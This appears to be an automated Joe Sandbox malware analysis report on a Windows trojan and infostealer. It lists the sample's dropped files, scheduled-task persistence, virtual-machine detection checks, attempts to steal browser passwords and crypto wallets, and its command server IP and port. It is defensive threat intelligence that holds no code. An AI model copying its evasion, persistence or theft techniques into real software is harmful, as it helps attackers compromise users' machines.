                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1615936 Sample: Uv4EriqDCj.exe Startdate: 15/02/2025 Architecture: WINDOWS Score: 100 52 api.ip.sb.cdn.cloudflare.net 2->52 54 api.ip.sb 2->54 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 10 other signatures 2->66 8 Uv4EriqDCj.exe 7 2->8         started        12 nXUcBcEOyROdbV.exe 2->12         started        signatures3 process4 file5 44 C:\Users\user\AppData\...\nXUcBcEOyROdbV.exe, PE32 8->44 dropped 46 C:\...\nXUcBcEOyROdbV.exe:Zone.Identifier, ASCII 8->46 dropped 48 C:\Users\user\AppData\Local\...\tmpA9D3.tmp, XML 8->48 dropped 50 C:\Users\user\AppData\...\Uv4EriqDCj.exe.log, ASCII 8->50 dropped 68 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->68 70 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 8->70 72 Uses schtasks.exe or at.exe to add and modify task schedules 8->72 76 2 other signatures 8->76 14 Uv4EriqDCj.exe 15 51 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        74 Multi AV Scanner detection for dropped file 12->74 24 nXUcBcEOyROdbV.exe 12->24         started        26 schtasks.exe 12->26         started        28 nXUcBcEOyROdbV.exe 12->28         started        signatures6 process7 dnsIp8 56 185.222.58.36, 49736, 49739, 49741 ROOTLAYERNETNL Netherlands 14->56 58 api.ip.sb.cdn.cloudflare.net 104.26.12.31, 443, 49740, 49742 CLOUDFLARENETUS United States 14->58 30 conhost.exe 14->30         started        78 Loading BitLocker PowerShell Module 18->78 32 conhost.exe 18->32         started        34 WmiPrvSE.exe 18->34         started        36 conhost.exe 20->36         started        38 conhost.exe 22->38         started        80 Tries to harvest and steal browser information (history, passwords, etc) 24->80 82 Tries to steal Crypto Currency Wallets 24->82 40 conhost.exe 24->40         started        42 conhost.exe 26->42         started        signatures9 process10

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Uv4EriqDCj.exe58%VirustotalBrowse
                  Uv4EriqDCj.exe57%ReversingLabsWin32.Trojan.Jalapeno
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe57%ReversingLabsWin32.Trojan.Jalapeno
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://ns.microsoft.co2/t/Re0%Avira URL Cloudsafe
                  http://ns.adobe.0/xmp0%Avira URL Cloudsafe
                  http://ns.adob/1.0/_0%Avira URL Cloudsafe
                  http://185.222.58.36:55615t-oq0%Avira URL Cloudsafe
                  http://185.222.58.36:556150%Avira URL Cloudsafe
                  http://185.222.58.36:50%Avira URL Cloudsafe
                  185.222.58.36:556150%Avira URL Cloudsafe
                  http://185.222.58.36:55615/0%Avira URL Cloudsafe
                  https://api.ipify.orgcoo0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  api.ip.sb.cdn.cloudflare.net
                  104.26.12.31
                  truefalse
                    high
                    api.ip.sb
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://api.ip.sb/geoipfalse
                        high
                        185.222.58.36:55615true
                        • Avira URL Cloud: safe
                        unknown
                        http://185.222.58.36:55615/true
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabUv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drfalse
                          high
                          http://www.fontbureau.com/designersGUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/ac/?q=Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drfalse
                              high
                              http://www.fontbureau.com/designers/?Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/bTheUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXUv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designers?Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://tempuri.org/Endpoint/EnvironmentSettingsUv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://ns.adobe.0/xmpUv4EriqDCj.exe, 00000008.00000002.1861851189.00000000012CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://ns.adob/1.0/_Uv4EriqDCj.exe, 00000008.00000002.1861851189.00000000012CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://schemas.xmlsoap.org/soap/envelope/nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://ns.microsoft.co2/t/ReUv4EriqDCj.exe, 00000008.00000002.1861851189.00000000012CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.tiro.comUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://tempuri.org/nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drfalse
                                                high
                                                http://www.fontbureau.com/designersUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.goodfont.co.krUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://tempuri.org/Endpoint/VerifyUpdateResponseUv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://tempuri.org/Endpoint/SetEnvironmentnXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.000000000311A000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://tempuri.org/Endpoint/SetEnvironmentResponseUv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.sajatypeworks.comUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://tempuri.org/Endpoint/GetUpdatesnXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.typography.netDUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.founder.com.cn/cn/cTheUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.galapagosdesign.com/staff/dennis.htmUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://api.ipify.orgcookies//settinString.RemovegUv4EriqDCj.exe, Uv4EriqDCj.exe, 00000008.00000002.1859795881.0000000000402000.00000040.00000400.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000A.00000002.1792920578.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchUv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drfalse
                                                                        high
                                                                        http://www.galapagosdesign.com/DPleaseUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://tempuri.org/Endpoint/VerifyUpdateUv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://tempuri.org/0Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.fonts.comUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.sandoll.co.krUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.urwpp.deDPleaseUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://185.222.58.36:55615t-oqnXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.00000000030C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.zhongyicts.com.cnUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUv4EriqDCj.exe, 00000000.00000002.1750602650.0000000002B9B000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000A.00000002.1790379285.00000000026DB000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.sakkal.comUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://185.222.58.36:5nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.000000000311A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://ipinfo.io/ip%appdata%Uv4EriqDCj.exe, Uv4EriqDCj.exe, 00000008.00000002.1859795881.0000000000402000.00000040.00000400.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000A.00000002.1792920578.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.apache.org/licenses/LICENSE-2.0Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.fontbureau.comUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoUv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousUv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://tempuri.org/Endpoint/CheckConnectResponseUv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.datacontract.org/2004/07/Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.00000000030C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://api.ip.sb/geoip%USERPEnvironmentROFILE%Uv4EriqDCj.exe, Uv4EriqDCj.exe, 00000008.00000002.1859795881.0000000000402000.00000040.00000400.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000A.00000002.1792920578.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://api.ip.sbnXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002FD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Endpoint/CheckConnectUv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.ecosia.org/newtab/Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drfalse
                                                                                                                  high
                                                                                                                  https://www.chiark.greenend.org.uk/~sgtatham/putty/0Uv4EriqDCj.exe, nXUcBcEOyROdbV.exe.0.drfalse
                                                                                                                    high
                                                                                                                    http://tempuri.org/Endpoint/SetEnvironnXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.000000000311A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.carterandcone.comlUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://ac.ecosia.org/autocomplete?q=Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drfalse
                                                                                                                          high
                                                                                                                          http://185.222.58.36:55615Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002DD6000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://www.fontbureau.com/designers/cabarga.htmlNUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.founder.com.cn/cnUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.fontbureau.com/designers/frere-user.htmlUv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingUv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://tempuri.org/Endpoint/GetUpdatesResponseUv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.jiyu-kobo.co.jp/Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://tempuri.org/Endpoint/EnvironmentSettingsResponseUv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.fontbureau.com/designers8Uv4EriqDCj.exe, 00000000.00000002.1756591363.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Uv4EriqDCj.exe, 00000008.00000002.1866030651.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmp505.tmp.15.dr, tmpA530.tmp.8.dr, tmpA4CC.tmp.8.dr, tmp98F8.tmp.15.dr, tmp98D6.tmp.15.dr, tmp6E47.tmp.8.dr, tmpCF2D.tmp.15.dr, tmp6E58.tmp.8.dr, tmp6E79.tmp.8.dr, tmpCEFD.tmp.15.dr, tmpA4ED.tmp.8.dr, tmpA4DD.tmp.8.dr, tmpCF4D.tmp.15.dr, tmp6E36.tmp.8.dr, tmpA50F.tmp.8.dr, tmpA51F.tmp.8.dr, tmp4E5.tmp.15.dr, tmp6E68.tmp.8.dr, tmp3A5F.tmp.15.drfalse
                                                                                                                                            high
                                                                                                                                            https://api.ipify.orgcooUv4EriqDCj.exefalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://schemas.xmlsoap.org/soap/actor/nextUv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, nXUcBcEOyROdbV.exe, 0000000F.00000002.1907816017.0000000002F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs
                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              104.26.12.31
                                                                                                                                              api.ip.sb.cdn.cloudflare.netUnited States
                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                              185.222.58.36
                                                                                                                                              unknownNetherlands
                                                                                                                                              51447ROOTLAYERNETNLtrue
                                                                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                                                                              Analysis ID:1615936
                                                                                                                                              Start date and time:2025-02-15 18:10:20 +01:00
                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 8m 10s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:full
                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                              Number of analysed new started processes analysed:21
                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Sample name:Uv4EriqDCj.exe
                                                                                                                                              renamed because original name is a hash value
                                                                                                                                              Original Sample Name:2a0be8c3a23c505c1ddbe5502b63efc0.exe
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@23/107@1/2
                                                                                                                                              EGA Information:
                                                                                                                                              • Successful, ratio: 75%
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 98%
                                                                                                                                              • Number of executed functions: 293
                                                                                                                                              • Number of non-executed functions: 44
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 2.19.106.160, 4.245.163.56, 13.107.246.45
                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                              • Execution Graph export aborted for target nXUcBcEOyROdbV.exe, PID 7748 because it is empty
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                              TimeTypeDescription
                                                                                                                                              12:11:15API Interceptor44x Sleep call for process: Uv4EriqDCj.exe modified
                                                                                                                                              12:11:17API Interceptor39x Sleep call for process: powershell.exe modified
                                                                                                                                              12:11:20API Interceptor47x Sleep call for process: nXUcBcEOyROdbV.exe modified
                                                                                                                                              17:11:19Task SchedulerRun new task: nXUcBcEOyROdbV path: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
